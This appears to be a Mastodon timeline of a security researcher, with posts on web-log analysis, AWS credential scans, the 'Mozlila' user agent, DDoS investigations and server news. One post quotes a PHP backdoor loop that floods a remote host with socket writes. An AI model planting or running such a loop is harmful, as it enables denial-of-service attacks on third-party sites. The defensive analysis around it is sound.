Pinned post
Daniel Cid

Remember. If you want your profile to be public here:

noc.social/explore

You need to go to Preferences->Profile and check "List this account in the directory".

Otherwise it won't show.

1+
Pinned post
Daniel Cid

My 7yo: "When I grow up, I want to be just like my daddy. He doesn't work and just spends his day at the computer doing nothing."

1
Daniel Cid

Seeing quite a few scans for /.aws/credential

Trying to get the keys used by the AWS CLI tool. Check your logs and that you do not have them exposed.

You do not want that surprise AWS bill because your account got compromised.

trunc.org/learning/aws-credent

0
Daniel Cid

The unfamous user agent: Mozlila/5.0 (notice the typo, not Mozilla)

It is on everyone's web logs as part of many web attack campaigns.

Grep for it and you will confirm:

$ grep Mozlila /var/log/apache2/*log

$ grep Mozlila /var/log/nginx/*log

More details about it here:

trunc.org/learning/the-mozlila

0
Daniel Cid boosted
tony

We love some good ole fashion research. here is the start of a cool series @dcid and I are working on to better understand the TTPs being used by bad actors to attack WordPress in 2022..

Enjoy.. :)

noc.org/articles/how-wordpress

0
Daniel Cid boosted
Vinicius Mello

@dcid interesting that port 53 is hardcoded. I vaguely remember using a rule like:

# iptables -A FORWARD -p udp --dport 53 -m length --length 512: -j DROP

(i.e block UDP packets > 512 bytes on port 53)

1
Daniel Cid boosted
tony

Nice @dcid builds on his remediation analysis and shows how a WordPress website was being used to DOS other sites noc.org/articles/php-backdoor-

0
Daniel Cid

A PHP backdoor on a compromised site being used to start attacks:

while(true)
{
$fp=fsockopen($trh2,$trp,$aaa1,$aaa2,1);
fwrite($fp,$spdat);
}

noc.org/articles/php-backdoor-

1
Daniel Cid boosted
Jerry Bell

If you use Atlassian products, time to put on a helmet: theregister.com/2022/07/21/atl

1+
Daniel Cid boosted
seb - buttons are toys!

published some notes about securing mastodon servers
#mastoadmin

decrypt.fail/securing-mastodon

1+
Daniel Cid boosted
tony

Cool analysis by @dcid on a hacked web server that was being used by to DDOS other sites...

trunc.org/learning/investigati

0
Daniel Cid

Did you know that when your filesystem is full and nginx can't write to the log file, it will log that it was unable to log to the log file?

[alert] write() to "/var/log/nginx/access.log" failed (28: No space left on device) while logging request...

trunc.org/learning/everything-

0
Daniel Cid

There are logs and there are LOGS (all uppercase).

Some logs can be noisy and pretty useless while others might indicate a serious issue that you have to respond right away.

Today critical log: PHP Fatal errors:

trunc.org/learning/php-fatal-e

0
Daniel Cid boosted
tony

Been slowly crawling out of my cave, and can't think of someone better to chat with than my friend Jennifer Bourne about past experiences and current projects..

Episode: jenniferbourn.com/podcast/prio

0
Daniel Cid

My main source of morning news ( news.ycombinator.com/ ) has been down since the morning.

5+ hours now.

Their IP is not even pinging, so it looks like the server is having a bad day...

0
Daniel Cid

Now twitter is blocking "search.noc.social" from being shared there.

Just gives this random error of "something went wrong".

If it could not get any worse...

1+
Daniel Cid

Lesson of the day:

1- Never block one of the CDN IP addresses on your server.

search.noc.social should be back online properly now.

🤦 🤦 🤦

0
Daniel Cid boosted
Software Freedom Conservancy

Heads up! #Microsoft is on track to ban all commercial activity by #FOSS projects on Microsoft Store in about a week! This is even worse than their (eventually repealed) 2011 ban on #copyleft for their app store! 😡️ We demand rollback of this new policy: sfconservancy.org/blog/2022/ju

1+
Daniel Cid boosted
The Doctor
1+
Daniel Cid

Analysis of a HTTP-based DDoS.

-7,000 different attacking IP addresses.

-20,000+ requests per second.

-DDoS-for-hire?

trunc.org/learning/http-flood-

1
Daniel Cid boosted
Developer Memes

"Where do you see yourself in 5 years?"

submitted by omegaweaponzero
reddit.com/r/ProgrammerHumor/c

1+
Daniel Cid

Did you know that if you are using Signal to share a link with someone, it will use the "WhatsApp" user agent?

More on HTTP user agents here:

trunc.org/learning/http-user-a

0
Show older
Noc.Social

Open Source Social Network. Focused on technology, networking, linux, privacy and security, but open to anyone. Civil discourse, polite and open. Managed by the noc.org team.

Trending now

Resources

Developers

What is Mastodon?

noc.social

More…

v3.5.0 · Privacy policy